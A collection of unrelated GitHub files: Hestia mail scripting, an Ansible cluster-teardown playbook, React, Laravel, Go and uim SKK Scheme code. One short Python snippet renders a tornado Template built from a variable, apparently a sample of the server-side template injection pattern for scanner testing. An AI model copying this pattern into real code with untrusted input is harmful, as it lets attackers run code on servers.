echo "*@$domain_idn:$email" >> $HOMEDIR/$user/conf/mail/$domain/aliases
fi
#----------------------------------------------------------#
# Hestia #
#----------------------------------------------------------#
# Adding catchall email to config
update_object_value 'mail' 'DOMAIN' "$domain" '$CATCHALL' "$email"
# Logging
log_history "added $email as catchall email for $domain"
log_event "$OK" "$ARGUMENTS"
exit
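# Example (hypothetical values; the wrapper name follows Hestia's usual v-*
# naming for these bin scripts and is an assumption):
#   v-add-mail-domain-catchall admin example.com catchall@example.com
# With the exim backend this appends "*@example.com:catchall@example.com" to
# $HOMEDIR/admin/conf/mail/example.com/aliases and stores the address in the
# domain's CATCHALL field.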
| {
"pile_set_name": "Github"
} |
---
- block:
- debug:
msg: "Deleting {{ cluster_dir }} using user {{ username }}"
- name: destroy terraform resources (openshift-install destroy cluster)
environment:
PATH: /usr/local/sbin:/sbin:/bin:/usr/sbin:/usr/bin:/root/bin:/usr/local/bin:/usr/local/bin:/root/bin
shell: openshift-install destroy cluster --dir={{ cluster_dir }}
become: yes
become_user: "{{ username }}"
register: destroyr
async: 1200
poll: 30
retries: 3
until: destroyr is succeeded
always:
- name: pack an archive of everything
archive:
path: "{{ cluster_dir }}"
dest: /tmp/{{ guid }}_{{ cluster_dir | basename }}.tar.gz
become: yes
become_user: "{{ username }}"
- name: get archive of environment target dir
fetch:
flat: yes
src: /tmp/{{ guid }}_{{ cluster_dir | basename }}.tar.gz
dest: "{{ hostvars.localhost.output_dir }}/{{ env_type }}_{{ guid }}_{{ guid }}_{{ cluster_dir | basename }}.tar.gz"
become: yes
become_user: "{{ username }}"
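# Example invocation (hypothetical playbook name and variable values):
#   ansible-playbook destroy_cluster.yml \
#     -e "cluster_dir=/home/student/cluster guid=a1b2 username=student env_type=ocp4"
# The play destroys the cluster with openshift-install and, whether or not that
# succeeds, archives {{ cluster_dir }} and fetches the tarball to output_dir.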
| {
"pile_set_name": "Github"
} |
erp5_base
erp5_immobilisation | {
"pile_set_name": "Github"
} |
import React from 'react';
import { FORM_URL } from '../constants';
export const wizardButtonText = 'Start the Higher-Level Review request';
export const wizardLabels = {
compensation: 'A disability compensation claim',
other: 'A benefit claim other than compensation',
no: 'No',
yes: 'Yes',
};
export const claimDescription = `What type of claim are you requesting for a
Higher-Level Review?`;
export const legacyDescription = (
<p>
Are any of the decisions you would like to request a Higher-Level Review for
currently in the <a href="/disability/file-an-appeal/">legacy appeals</a>{' '}
process?
</p>
);
export const startPageText = 'Request a Higher-Level Review';
export const alertHeading = `You’ll need to submit a paper form to request a
Higher-Level Review`;
export const AlertOtherTypeContent = (
<>
<p>
We’re sorry. You can only request a Higher-Level Review online for
compensation claims right now.
</p>
<p>
To request a Higher-Level Review for another benefit type, please fill out
a Decision Review Request: Higher-Level Review (VA Form 20-0996).
</p>
<a href={FORM_URL}>Download VA Form 20-0996 (PDF)</a>
</>
);
export const AlertLegacyContent = (
<>
<p>
      If you have a decision date before February 19, 2019 and received a
      Statement of the Case (SOC) or Supplemental Statement of the Case (SSOC)
      because you had filed an appeal under the old (or former) appeals system,
      you’ll have to opt in to the new decision review process via a submitted
      paper form.
</p>
<p>
To opt in, please fill out a Decision Review Request: Higher-Level Review
(VA Form 20-0996) and check “opt-in from SOC/SSOC” in box 15 of the paper
form.
</p>
<a href={FORM_URL}>Download VA Form 20-0996 (PDF)</a>
<p>
If you had not filed a legacy appeal within a year of the decision dated
      before February 19, 2019, you will need to{' '}
<a href="/decision-reviews/supplemental-claim/">
file a Supplemental Claim
</a>
.
</p>
</>
);
| {
"pile_set_name": "Github"
} |
<div class="leftlistinfo">
<div class="listinfo">
<div class="title"><label for="id_case_id_set">Case ID(s) :</label></div>
<div class="listinfo_input">{{ quick_form.case_id_set }}</div>
</div>
</div>
<div class="rightlistinfo">
</div>
<div class='clear'></div>
| {
"pile_set_name": "Github"
} |
import React from 'react'
import Link from 'gatsby-link'
import { StyleSheet, TouchableOpacity, Text, View } from 'react-native'
import { Video } from 'expo-av'
const styles = StyleSheet.create({
box: { padding: 10, margin: 10, borderWidth: 1, borderColor: 'black' },
text: { fontWeight: 'bold', color: 'red' },
button: {
marginVertical: 40,
paddingVertical: 20,
paddingHorizontal: 10,
borderWidth: 1,
borderColor: 'black',
backgroundColor: 'lightgrey',
alignItems: 'center',
},
buttonText: { fontWeight: 'bold', color: 'black' },
})
const RNWPage = () => (
<View style={styles.box}>
<Text style={styles.text}>
Hi this is React-Native-Web rendered by Gatsby
</Text>
<TouchableOpacity style={styles.button} onPress={() => alert('it works')}>
<Text style={styles.buttonText}>Button</Text>
</TouchableOpacity>
<Link to="/">Go to home</Link>
<Video
source={{
uri: 'https://d23dyxeqlo5psv.cloudfront.net/big_buck_bunny.mp4',
}}
rate={1.0}
isMuted={true}
resizeMode="cover"
shouldPlay={true}
isLooping={true}
style={{ width: 500, marginTop: 30 }}
/>
</View>
)
export default RNWPage
| {
"pile_set_name": "Github"
} |
<?php
namespace Illuminate\Session;
use SessionHandlerInterface;
use Illuminate\Support\InteractsWithTime;
use Symfony\Component\HttpFoundation\Request;
use Illuminate\Contracts\Cookie\QueueingFactory as CookieJar;
class CookieSessionHandler implements SessionHandlerInterface
{
use InteractsWithTime;
/**
* The cookie jar instance.
*
* @var \Illuminate\Contracts\Cookie\Factory
*/
protected $cookie;
/**
* The request instance.
*
* @var \Symfony\Component\HttpFoundation\Request
*/
protected $request;
/**
* The number of minutes the session should be valid.
*
* @var int
*/
protected $minutes;
/**
* Create a new cookie driven handler instance.
*
* @param \Illuminate\Contracts\Cookie\QueueingFactory $cookie
* @param int $minutes
* @return void
*/
public function __construct(CookieJar $cookie, $minutes)
{
$this->cookie = $cookie;
$this->minutes = $minutes;
}
/**
* {@inheritdoc}
*/
public function open($savePath, $sessionName)
{
return true;
}
/**
* {@inheritdoc}
*/
public function close()
{
return true;
}
/**
* {@inheritdoc}
*/
public function read($sessionId)
{
$value = $this->request->cookies->get($sessionId) ?: '';
if (! is_null($decoded = json_decode($value, true)) && is_array($decoded)) {
if (isset($decoded['expires']) && $this->currentTime() <= $decoded['expires']) {
return $decoded['data'];
}
}
return '';
}
/**
* {@inheritdoc}
*/
public function write($sessionId, $data)
{
$this->cookie->queue($sessionId, json_encode([
'data' => $data,
'expires' => $this->availableAt($this->minutes * 60),
]), $this->minutes);
return true;
}
/**
* {@inheritdoc}
*/
public function destroy($sessionId)
{
$this->cookie->queue($this->cookie->forget($sessionId));
return true;
}
/**
* {@inheritdoc}
*/
public function gc($lifetime)
{
return true;
}
/**
* Set the request instance.
*
* @param \Symfony\Component\HttpFoundation\Request $request
* @return void
*/
public function setRequest(Request $request)
{
$this->request = $request;
}
}
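
/*
 * Illustrative sketch (values are hypothetical): write($id, $data) queues a
 * cookie whose value is the JSON envelope that read() parses above, e.g.
 *
 *   {"data":"<serialized session payload>","expires":1700003600}
 *
 * read() returns only the "data" member, and only while currentTime() is not
 * past "expires"; otherwise it falls through to the empty string.
 */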
| {
"pile_set_name": "Github"
} |
{{extend 'layout.html'}}
<h1>Account</h1>
{{for flash in current.response.alerts(category_filter='auth'):}}
<div class="flash_message">{{=flash}}</div>
{{pass}}
{{=form}}
| {
"pile_set_name": "Github"
} |
name: bus_update_request_end
ID: 560
format:
field:unsigned short common_type; offset:0; size:2; signed:0;
field:unsigned char common_flags; offset:2; size:1; signed:0;
field:unsigned char common_preempt_count; offset:3; size:1; signed:0;
field:int common_pid; offset:4; size:4; signed:1;
field:__data_loc char[] name; offset:8; size:4; signed:0;
print fmt: "client-name:%s", __get_str(name)
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
<parent>
<artifactId>spring-cloud-codegen</artifactId>
<groupId>cn.springcloud.codegen</groupId>
<version>1.0.0</version>
<relativePath>..</relativePath>
</parent>
<modelVersion>4.0.0</modelVersion>
<artifactId>codegen-component-eureka</artifactId>
<dependencies>
<dependency>
<groupId>cn.springcloud.codegen</groupId>
<artifactId>codegen-framework</artifactId>
</dependency>
<dependency>
<groupId>org.slf4j</groupId>
<artifactId>slf4j-api</artifactId>
</dependency>
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-1.2-api</artifactId>
</dependency>
<dependency>
<groupId>org.slf4j</groupId>
<artifactId>slf4j-simple</artifactId>
<version>1.7.25</version>
</dependency>
<dependency>
<groupId>com.lmax</groupId>
<artifactId>disruptor</artifactId>
</dependency>
</dependencies>
</project> | {
"pile_set_name": "Github"
} |
import tornado
from tornado.template import Template
code = "{}"
result = tornado.template.Template(code)
template_injection_result = result.generate()
print(template_injection_result)
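# Illustration (hypothetical payload, not part of the original sample): if
# `code` came from user input, template expressions would be evaluated at
# render time, e.g.
#
#   user_code = "{{ 7 * 7 }}"               # attacker-controlled template source
#   print(Template(user_code).generate())   # prints b"49": server-side template injection
#
# which is why constructing Template() from untrusted strings is flagged.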
| {
"pile_set_name": "Github"
} |
15
15
15
15
15
15
15
15
0
15
15
15
15
15
15
15
15
15
15
15
15
15
15
0
0
15
0
0
0
0
0
15
15
0
0
15
15
15
15
15
15
15
15
15
0
0
0
0
0
0
0
0
15
0
0
0
15
15
15
15
0
0
0
15
0
0
0
0
0
0
15
15
15
0
0
0
15
15
15
15
15
0
0
0
0
0
0
0
0
0
0
15
0
0
0
0
0
15
15
15
15
15
0
0
0
0
0
0
0
0
15
15
0
0
0
0
0
0
15
15
15
15
15
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
15
15
15
15
15
15
0
0
0
0
0
0
0
0
0
0
0
0
0
15
15
15
15
15
15
15
0
0
0
0
0
0
0
0
0
0
0
0
0
15
15
15
15
15
15
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
15
15
15
15
15
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
15
15
15
15
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
15
15
15
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
15
15
15
0
0
15
15
0
0
0
0
0
0
0
0
0
0
0
0
0
15
15
15
15
15
15
15
0
0
0
0
0
0
0
0
0
0
0
0
15
15
15
15
15
15
15
0
0
0
0
0
0
0
0
0
0
15
0
15
15
15
15
15
15
15
15
15
15
15
0
0
15
15
0
0
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
15
| {
"pile_set_name": "Github"
} |
package hodl_test
import (
"testing"
"github.com/lightningnetwork/lnd/build"
"github.com/lightningnetwork/lnd/htlcswitch/hodl"
)
var hodlMaskTests = []struct {
mask hodl.Mask
flags map[hodl.Flag]struct{}
}{
{
// Check that the empty mask has no active flags.
mask: hodl.MaskNone,
flags: map[hodl.Flag]struct{}{},
},
{
// Check that passing no arguments to MaskFromFlags is
// equivalent to MaskNone.
mask: hodl.MaskFromFlags(),
flags: map[hodl.Flag]struct{}{},
},
{
		// Check that using Mask to convert a single flag into a Mask only
		// reports that flag as active.
mask: hodl.ExitSettle.Mask(),
flags: map[hodl.Flag]struct{}{
hodl.ExitSettle: {},
},
},
{
// Check that using MaskFromFlags on a single flag only reports
// that flag active.
mask: hodl.MaskFromFlags(hodl.Commit),
flags: map[hodl.Flag]struct{}{
hodl.Commit: {},
},
},
{
// Check that using MaskFromFlags on some-but-not-all flags
// reports the correct subset of flags as active.
mask: hodl.MaskFromFlags(
hodl.ExitSettle,
hodl.Commit,
hodl.AddIncoming,
hodl.SettleOutgoing,
),
flags: map[hodl.Flag]struct{}{
hodl.ExitSettle: {},
hodl.Commit: {},
hodl.AddIncoming: {},
hodl.SettleOutgoing: {},
},
},
{
// Check that using MaskFromFlags on all known flags reports
		// those and no other flags.
mask: hodl.MaskFromFlags(
hodl.ExitSettle,
hodl.AddIncoming,
hodl.SettleIncoming,
hodl.FailIncoming,
hodl.AddOutgoing,
hodl.SettleOutgoing,
hodl.FailOutgoing,
hodl.Commit,
hodl.BogusSettle,
),
flags: map[hodl.Flag]struct{}{
hodl.ExitSettle: {},
hodl.AddIncoming: {},
hodl.SettleIncoming: {},
hodl.FailIncoming: {},
hodl.AddOutgoing: {},
hodl.SettleOutgoing: {},
hodl.FailOutgoing: {},
hodl.Commit: {},
hodl.BogusSettle: {},
},
},
}
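// For example, the mask hodl.MaskFromFlags(hodl.ExitSettle, hodl.Commit)
// reports Active() as true for exactly those two flags and as false for
// every other bit position, which is the property TestMask below verifies
// for each entry in hodlMaskTests.
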
// TestMask iterates through all of the hodlMaskTests, checking that the mask
// correctly reports active for flags in the tests' expected flags, and inactive
// for all others.
func TestMask(t *testing.T) {
if !build.IsDevBuild() {
t.Fatalf("htlcswitch tests must be run with '-tags=dev'")
}
for i, test := range hodlMaskTests {
		for j := uint32(0); j < 32; j++ {
flag := hodl.Flag(1 << j)
_, shouldBeActive := test.flags[flag]
switch {
case shouldBeActive && !test.mask.Active(flag):
t.Fatalf("hodl mask test #%d -- "+
"expected flag %s to be active",
i, flag)
case !shouldBeActive && test.mask.Active(flag):
t.Fatalf("hodl mask test #%d -- "+
"expected flag %s to be inactive",
i, flag)
}
}
}
}
| {
"pile_set_name": "Github"
} |
;;;
;;; Copyright (c) 2003-2013 uim Project https://github.com/uim/uim
;;;
;;; All rights reserved.
;;;
;;; Redistribution and use in source and binary forms, with or without
;;; modification, are permitted provided that the following conditions
;;; are met:
;;; 1. Redistributions of source code must retain the above copyright
;;; notice, this list of conditions and the following disclaimer.
;;; 2. Redistributions in binary form must reproduce the above copyright
;;; notice, this list of conditions and the following disclaimer in the
;;; documentation and/or other materials provided with the distribution.
;;; 3. Neither the name of authors nor the names of its contributors
;;; may be used to endorse or promote products derived from this software
;;; without specific prior written permission.
;;;
;;; THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS ``AS IS'' AND
;;; ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
;;; IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
;;; ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDERS OR CONTRIBUTORS BE LIABLE
;;; FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
;;; DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
;;; OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
;;; HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
;;; LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
;;; OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
;;; SUCH DAMAGE.
;;;;
;; SKK is a Japanese input method
;;
;; EUC-JP
;;
;; SKK input consists of the following states.
;; Following is the list of SKK input states:
;;   direct input               direct
;;   kanji input                kanji
;;   headword completion        completion
;;   converting                 converting
;;   okurigana input            okuri
;;   half-width alphanumeric    latin
;;   full-width alphanumeric    wide-latin
;;   kanji code input           kcode
;;
;;
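;;
;; Typical conversion flow (illustrative, standard SKK behaviour): typing
;; "K a n j i" in direct mode enters the kanji state and shows "▽かんじ";
;; SPC starts conversion and shows "▼漢字"; further SPC presses cycle through
;; the remaining candidates, and RET commits the selected string.
;;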
(require "japanese.scm")
(require-custom "generic-key-custom.scm")
(require-custom "skk-custom.scm")
(require-custom "skk-key-custom.scm")
;;; user config
;; TODO: Support new custom type string-list. It involves character
;; encoding conversion problem. -- YamaKen 2005-02-02
(define skk-auto-start-henkan-keyword-list '("を" "、" "。" "." "," "?" "」" "!" ";" ":" ")" ";" ":" ")" "”" "】" "』" "》" "〉" "}" "]" "〕" "}" "]" "?" "." "," "!"))
(define skk-ddskk-like-heading-label-char-list '("a" "s" "d" "f" "j" "k" "l"))
(define skk-uim-heading-label-char-list '("1" "2" "3" "4" "5" "6" "7" "8" "9" "0"))
(define skk-ja-rk-rule (append ja-rk-rule-basic ja-rk-rule-additional))
(define skk-okuri-char-alist '())
(define skk-downcase-alist '())
(define skk-set-henkan-point-key '())
(define skk-ichar-downcase
(lambda (x)
(or (cdr (or (assoc x skk-downcase-alist)
'(#f . #f)))
(ichar-downcase x))))
(define skk-ichar-upper-case?
(lambda (x)
(or (if (assoc x skk-downcase-alist) #t #f) (ichar-upper-case? x))))
(define skk-context-set-okuri-head-using-alist!
(lambda (sc s)
(skk-context-set-okuri-head!
sc
(or (cdr (or (assoc s skk-okuri-char-alist)
'(#f . #f)))
s))))
;; style specification
(define skk-style-spec
'(;; (style-element-name . validator)
(skk-preedit-attr-mode-mark . preedit-attr?)
(skk-preedit-attr-head . preedit-attr?)
(skk-preedit-attr-okuri . preedit-attr?)
(skk-preedit-attr-pending-rk . preedit-attr?)
(skk-preedit-attr-conv-body . preedit-attr?)
(skk-preedit-attr-conv-okuri . preedit-attr?)
(skk-preedit-attr-conv-appendix . preedit-attr?)
(skk-preedit-attr-direct-pending-rk . preedit-attr?)
(skk-preedit-attr-child-beginning-mark . preedit-attr?)
(skk-preedit-attr-child-end-mark . preedit-attr?)
(skk-preedit-attr-child-committed . preedit-attr?)
(skk-preedit-attr-child-dialog . preedit-attr?)
(skk-preedit-attr-dcomp . preedit-attr?)
(skk-child-context-beginning-mark . string?)
(skk-child-context-end-mark . string?)
(skk-show-cursor-on-preedit? . boolean?)
(skk-show-candidates-with-okuri? . boolean?)))
;; predefined styles
(define skk-style-uim
'((skk-preedit-attr-mode-mark . preedit-reverse)
(skk-preedit-attr-head . preedit-reverse)
(skk-preedit-attr-okuri . preedit-reverse)
(skk-preedit-attr-pending-rk . preedit-reverse)
(skk-preedit-attr-conv-body . preedit-reverse)
(skk-preedit-attr-conv-okuri . preedit-reverse)
(skk-preedit-attr-conv-appendix . preedit-reverse)
(skk-preedit-attr-direct-pending-rk . preedit-underline)
(skk-preedit-attr-child-beginning-mark . preedit-reverse)
(skk-preedit-attr-child-end-mark . preedit-reverse)
(skk-preedit-attr-child-committed . preedit-reverse)
(skk-preedit-attr-child-dialog . preedit-none)
(skk-preedit-attr-dcomp . preedit-none)
(skk-child-context-beginning-mark . "[")
(skk-child-context-end-mark . "]")
(skk-show-cursor-on-preedit? . #f)
(skk-show-candidates-with-okuri? . #t)))
(define skk-style-ddskk-like
'((skk-preedit-attr-mode-mark . preedit-underline)
(skk-preedit-attr-head . preedit-underline)
(skk-preedit-attr-okuri . preedit-underline)
(skk-preedit-attr-pending-rk . preedit-underline)
(skk-preedit-attr-conv-body . preedit-reverse)
(skk-preedit-attr-conv-okuri . preedit-underline)
(skk-preedit-attr-conv-appendix . preedit-underline)
(skk-preedit-attr-direct-pending-rk . preedit-underline)
(skk-preedit-attr-child-beginning-mark . preedit-underline)
(skk-preedit-attr-child-end-mark . preedit-underline)
(skk-preedit-attr-child-committed . preedit-underline)
(skk-preedit-attr-child-dialog . preedit-none)
(skk-preedit-attr-dcomp . preedit-underline)
(skk-child-context-beginning-mark . "【")
(skk-child-context-end-mark . "】")
(skk-show-cursor-on-preedit? . #t)
(skk-show-candidates-with-okuri? . #f)))
;;; implementations
(define skk-type-hiragana 0)
(define skk-type-katakana 1)
(define skk-type-hankana 2)
(define skk-input-rule-roma 0)
(define skk-input-rule-azik 1)
(define skk-input-rule-act 2)
(define skk-input-rule-kzik 3)
(define skk-child-type-editor 0)
(define skk-child-type-dialog 1)
;; style elements
(define skk-preedit-attr-mode-mark #f)
(define skk-preedit-attr-head #f)
(define skk-preedit-attr-okuri #f)
(define skk-preedit-attr-pending-rk #f)
(define skk-preedit-attr-conv-body #f)
(define skk-preedit-attr-conv-okuri #f)
(define skk-preedit-attr-conv-appendix #f)
(define skk-preedit-attr-direct-pending-rk #f)
(define skk-preedit-attr-child-beginning-mark #f)
(define skk-preedit-attr-child-end-mark #f)
(define skk-preedit-attr-child-committed #f)
(define skk-preedit-attr-child-dialog #f)
(define skk-preedit-attr-dcomp #f)
(define skk-child-context-beginning-mark #f)
(define skk-child-context-end-mark #f)
(define skk-show-cursor-on-preedit? #f)
(define skk-show-candidates-with-okuri? #f)
(define skk-dic #f)
(define skk-context-list '())
(define skk-prepare-activation
(lambda (sc)
(skk-flush sc)
(skk-update-preedit sc)))
(register-action 'action_skk_hiragana
(lambda (sc)
'(ja_hiragana
"あ"
"ひらがな"
"ひらがな入力モード"))
(lambda (sc)
(let ((dsc (skk-find-descendant-context sc)))
(and (not (skk-latin-state? dsc))
(= (skk-context-kana-mode dsc)
skk-type-hiragana))))
(lambda (sc)
(let ((dsc (skk-find-descendant-context sc)))
(skk-prepare-activation dsc)
(skk-context-set-state! dsc 'skk-state-direct)
(skk-context-set-kana-mode! dsc skk-type-hiragana))))
(register-action 'action_skk_katakana
(lambda (sc)
'(ja_katakana
"ア"
"カタカナ"
"カタカナ入力モード"))
(lambda (sc)
(let ((dsc (skk-find-descendant-context sc)))
(and (not (skk-latin-state? dsc))
(= (skk-context-kana-mode dsc)
skk-type-katakana))))
(lambda (sc)
(let ((dsc (skk-find-descendant-context sc)))
(skk-prepare-activation dsc)
(skk-context-set-state! dsc 'skk-state-direct)
(skk-context-set-kana-mode! dsc skk-type-katakana))))
(register-action 'action_skk_hankana
(lambda (sc)
'(ja_halfkana
"ア"
"半角カタカナ"
"半角カタカナ入力モード"))
(lambda (sc)
(let ((dsc (skk-find-descendant-context sc)))
(and (not (skk-latin-state? dsc))
(= (skk-context-kana-mode dsc)
skk-type-hankana))))
(lambda (sc)
(let ((dsc (skk-find-descendant-context sc)))
(skk-prepare-activation dsc)
(skk-context-set-state! dsc 'skk-state-direct)
(skk-context-set-kana-mode! dsc skk-type-hankana))))
(register-action 'action_skk_latin
(lambda (sc)
'(ja_halfwidth_alnum
"a"
"直接入力"
"直接(無変換)入力モード"))
(lambda (sc)
(let ((dsc (skk-find-descendant-context sc)))
(eq? (skk-context-state dsc)
'skk-state-latin)))
(lambda (sc)
(let ((dsc (skk-find-descendant-context sc)))
(skk-prepare-activation dsc)
(skk-context-set-state! dsc 'skk-state-latin))))
(register-action 'action_skk_wide_latin
(lambda (sc)
'(ja_fullwidth_alnum
"A"
"全角英数"
"全角英数入力モード"))
(lambda (sc)
(let ((dsc (skk-find-descendant-context sc)))
(eq? (skk-context-state dsc)
'skk-state-wide-latin)))
(lambda (sc)
(let ((dsc (skk-find-descendant-context sc)))
(skk-prepare-activation dsc)
(skk-context-set-state! dsc 'skk-state-wide-latin))))
(register-action 'action_skk_roma
(lambda (sc)
'(ja_romaji
"R"
"ローマ字"
"ローマ字入力モード"))
(lambda (sc)
(let ((dsc (skk-find-descendant-context sc)))
(= (skk-context-input-rule dsc)
skk-input-rule-roma)))
(lambda (sc)
(let ((dsc (skk-find-descendant-context sc)))
(skk-prepare-activation dsc)
(skk-set-rule! dsc skk-input-rule-roma))))
(register-action 'action_skk_azik
(lambda (sc)
'(ja_azik
"Z"
"AZIK"
"AZIK拡張ローマ字入力モード"))
(lambda (sc)
(let ((dsc (skk-find-descendant-context sc)))
(= (skk-context-input-rule dsc)
skk-input-rule-azik)))
(lambda (sc)
(let ((dsc (skk-find-descendant-context sc)))
(skk-prepare-activation dsc)
(skk-set-rule! dsc skk-input-rule-azik))))
(register-action 'action_skk_act
(lambda (sc)
'(ja_act
"C"
"ACT"
"ACT拡張ローマ字入力モード"))
(lambda (sc)
(let ((dsc (skk-find-descendant-context sc)))
(= (skk-context-input-rule dsc)
skk-input-rule-act)))
(lambda (sc)
(let ((dsc (skk-find-descendant-context sc)))
(skk-prepare-activation dsc)
(skk-set-rule! dsc skk-input-rule-act))))
(register-action 'action_skk_kzik
(lambda (sc)
'(ja_kzik
"K"
"KZIK"
"KZIK拡張ローマ字入力モード"))
(lambda (sc)
(let ((dsc (skk-find-descendant-context sc)))
(= (skk-context-input-rule dsc)
skk-input-rule-kzik)))
(lambda (sc)
(let ((dsc (skk-find-descendant-context sc)))
(skk-prepare-activation dsc)
(skk-set-rule! dsc skk-input-rule-kzik))))
;; Update widget definitions based on action configurations. The
;; procedure is needed for on-the-fly reconfiguration involving the
;; custom API
(define skk-configure-widgets
(lambda ()
(register-widget 'widget_skk_input_mode
(activity-indicator-new skk-input-mode-actions)
(actions-new skk-input-mode-actions))
(register-widget 'widget_skk_kana_input_method
(activity-indicator-new skk-kana-input-method-actions)
(actions-new skk-kana-input-method-actions))
(context-list-replace-widgets! 'skk skk-widgets)))
(define skk-context-rec-spec
(append
context-rec-spec
(list
(list 'state 'skk-state-latin)
(list 'kana-mode skk-type-hiragana)
(list 'input-rule skk-input-rule-roma)
(list 'head '())
(list 'okuri-head "")
(list 'okuri '())
(list 'appendix '())
(list 'dcomp-word "")
;(list 'candidates '())
(list 'nth 0)
(list 'nr-candidates 0)
(list 'rk-context '())
(list 'candidate-op-count 0)
(list 'candidate-window #f)
(list 'child-context '())
(list 'child-type '())
(list 'parent-context '())
(list 'editor '())
(list 'dialog '())
(list 'latin-conv #f)
(list 'commit-raw #f)
(list 'completion-nth 0))))
(define-record 'skk-context skk-context-rec-spec)
(define skk-context-new-internal skk-context-new)
(define skk-set-rule!
(lambda (sc input-rule)
(let ((rkc (skk-context-rk-context sc))
(rule (cond
((= input-rule skk-input-rule-roma)
(set! skk-okuri-char-alist '())
(set! skk-downcase-alist '())
(set! skk-set-henkan-point-key '())
skk-ja-rk-rule)
((= input-rule skk-input-rule-azik)
(require "japanese-azik.scm")
(set! skk-okuri-char-alist ja-azik-skk-okuri-char-alist)
(set! skk-downcase-alist ja-azik-skk-downcase-alist)
(set! skk-set-henkan-point-key ja-azik-skk-set-henkan-point-key)
ja-azik-rule)
((= input-rule skk-input-rule-act)
(require "japanese-act.scm")
(set! skk-okuri-char-alist ja-act-skk-okuri-char-alist)
(set! skk-downcase-alist ja-act-skk-downcase-alist)
(set! skk-set-henkan-point-key ja-act-skk-set-henkan-point-key)
ja-act-rule)
((= input-rule skk-input-rule-kzik)
(require "japanese-kzik.scm")
(set! skk-okuri-char-alist '())
(set! skk-downcase-alist '())
(set! skk-set-henkan-point-key '())
ja-kzik-rule))))
(skk-context-set-input-rule! sc input-rule)
(rk-context-set-rule! rkc rule))))
(define skk-find-root-context
(lambda (sc)
(let ((pc (skk-context-parent-context sc)))
(if (not (null? pc))
(skk-find-root-context pc)
sc))))
(define skk-find-descendant-context
(lambda (sc)
(let ((csc (skk-context-child-context sc)))
(if (not (null? csc))
(skk-find-descendant-context csc)
sc))))
(define skk-read-personal-dictionary
(lambda ()
(if (not (setugid?))
(or (skk-lib-read-personal-dictionary skk-dic
skk-uim-personal-dic-filename)
(skk-lib-read-personal-dictionary skk-dic
skk-personal-dic-filename)))))
(define skk-save-personal-dictionary
(lambda ()
(if (not (setugid?))
(skk-lib-save-personal-dictionary skk-dic
skk-uim-personal-dic-filename))))
(define skk-flush
(lambda (sc)
(let ((csc (skk-context-child-context sc)))
(rk-flush (skk-context-rk-context sc))
(if skk-use-recursive-learning?
(skk-editor-flush (skk-context-editor sc)))
(skk-dialog-flush (skk-context-dialog sc))
(if (not (skk-latin-state? sc))
(skk-context-set-state! sc 'skk-state-direct))
(skk-context-set-head! sc '())
(skk-context-set-okuri-head! sc "")
(skk-context-set-okuri! sc '())
(skk-context-set-appendix! sc '())
(skk-reset-dcomp-word sc)
(skk-reset-candidate-window sc)
(skk-context-set-nr-candidates! sc 0)
(skk-context-set-latin-conv! sc #f)
(skk-context-set-child-context! sc '())
(skk-context-set-child-type! sc '())
(if (not (null? csc))
(skk-flush csc)))))
(define skk-context-new
(lambda (id im)
(if (not skk-dic)
(let ((hostname (if skk-skkserv-use-env?
(or (getenv "SKKSERVER") "localhost")
skk-skkserv-hostname)))
(if skk-use-recursive-learning?
(require "skk-editor.scm"))
(require "skk-dialog.scm")
(set! skk-dic (skk-lib-dic-open skk-dic-file-name
skk-use-skkserv?
hostname
skk-skkserv-portnum
skk-skkserv-address-family))
(if skk-use-look?
(skk-lib-look-open skk-look-dict))
(skk-read-personal-dictionary)))
(let ((sc (skk-context-new-internal id im))
(rkc (rk-context-new skk-ja-rk-rule #t #f)))
(skk-context-set-widgets! sc skk-widgets)
(skk-context-set-head! sc '())
(skk-context-set-rk-context! sc rkc)
(skk-context-set-child-context! sc '())
(skk-context-set-parent-context! sc '())
(if skk-use-recursive-learning?
(skk-context-set-editor! sc (skk-editor-new sc)))
(skk-context-set-dialog! sc (skk-dialog-new sc))
(skk-flush sc)
(skk-context-set-state! sc 'skk-state-latin)
sc)))
(define skk-latin-state?
(lambda (sc)
(case (skk-context-state sc)
((skk-state-latin skk-state-wide-latin) #t)
(else #f))))
(define skk-make-string
(lambda (sl kana)
(let ((get-str-by-type
(lambda (l)
(cond
((= kana skk-type-hiragana)
(caar l))
((= kana skk-type-katakana)
(car (cdar l)))
((= kana skk-type-hankana)
(cadr (cdar l)))))))
(if (not (null? sl))
(string-append (skk-make-string (cdr sl) kana)
(get-str-by-type sl))
""))))
(define skk-conv-wide-latin
(lambda (sl)
(let ((get-wide-latin-str
(lambda (l)
(ja-wide (caar l)))))
(if (not (null? sl))
(string-append (skk-conv-wide-latin (cdr sl))
(get-wide-latin-str sl))
""))))
(define skk-conv-opposite-case
(lambda (sl)
(let ((get-opposite-case-str
(lambda (l)
(let ((c (string->charcode (caar l))))
(cond
((ichar-upper-case? c)
